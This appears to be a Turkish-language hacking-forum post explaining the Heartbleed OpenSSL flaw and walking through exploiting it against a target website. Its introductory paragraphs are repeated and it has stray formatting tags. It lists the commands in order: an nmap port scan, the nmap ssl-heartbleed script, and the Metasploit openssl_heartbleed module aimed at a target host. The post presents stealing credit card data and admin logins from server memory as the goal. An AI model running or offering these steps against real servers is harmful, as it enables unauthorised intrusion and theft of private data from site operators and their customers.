Pâtya
Spys-Z
[font=Roboto, sans-serif]Gerekenler[/font][font=Roboto, sans-serif]:[/font]
[font=Roboto, sans-serif]Nmap ve Metasploit(kali,backtrack,parrot gibi linux dağıtımlarında yüklü gelir zaten windowsta yapacaksanız indirmeniz lazım bide windowsta nmapa script eklemek uğraştırır ben kali linux üzerinden yapacam anlatımı windows içinde kodlar vs aynı)[/font]
[font=Roboto, sans-serif]Heartbleed Nedir?[/font]
[font=Roboto, sans-serif]Heartbleed openssl kullanan sitelerde bulunma ihtimali olan bir güvenlik açığıdır. Eğer sitede heartbleed açığı varsa sunucu belleğinden bilgi sızdırmak mümkün bunlara kredi kartı bilgileri ve admin panel giriş bilgileride dahil. Ama tabiki databasenin tamamını çekmez %100 yararlı bir bilgi çıkacak diye birşey yok yani.[/font]
[font=Roboto, sans-serif]Hack İşlemi :[/font]
[font=Roboto, sans-serif]heartbleed açığı openssl kullanan sitelerde bulunur yani herşeyde önce sitenin http:// deil https:// olması lazım yani 443. portu açık olmalı hemen hedef sitede port taraması yapalım[/font]
[font=Roboto, sans-serif]Nmap ve Metasploit(kali,backtrack,parrot gibi linux dağıtımlarında yüklü gelir zaten windowsta yapacaksanız indirmeniz lazım bide windowsta nmapa script eklemek uğraştırır ben kali linux üzerinden yapacam anlatımı windows içinde kodlar vs aynı)[/font]
[font=Roboto, sans-serif]Heartbleed Nedir?[/font]
[font=Roboto, sans-serif]Heartbleed openssl kullanan sitelerde bulunma ihtimali olan bir güvenlik açığıdır. Eğer sitede heartbleed açığı varsa sunucu belleğinden bilgi sızdırmak mümkün bunlara kredi kartı bilgileri ve admin panel giriş bilgileride dahil. Ama tabiki databasenin tamamını çekmez %100 yararlı bir bilgi çıkacak diye birşey yok yani.[/font]
[font=Roboto, sans-serif]Hack İşlemi :[/font]
[font=Roboto, sans-serif]heartbleed açığı openssl kullanan sitelerde bulunur yani herşeyde önce sitenin http:// deil https:// olması lazım yani 443. portu açık olmalı hemen hedef sitede port taraması yapalım[/font]
PHP:
nmap -A hedef.com
[font=Roboto, sans-serif]Şimdi heartbleed açığı varmı bunu tarayalım:[/font]
PHP:
nmap -sV --script=ssl-heartbleed hedefsite.com
[font=Roboto, sans-serif]metasploit i açalım[/font][/font][/size]
PHP:
msfconsole
PHP:
use auxiliary/scanner/ssl/openssl_heartbleed
PHP:
show options
PHP:
set RHOSTS hedef.com
[/font][/size][/font][/size][/font][/size][/font][/size][/font][/size]
PHP:
set verbose true
PHP:
exploit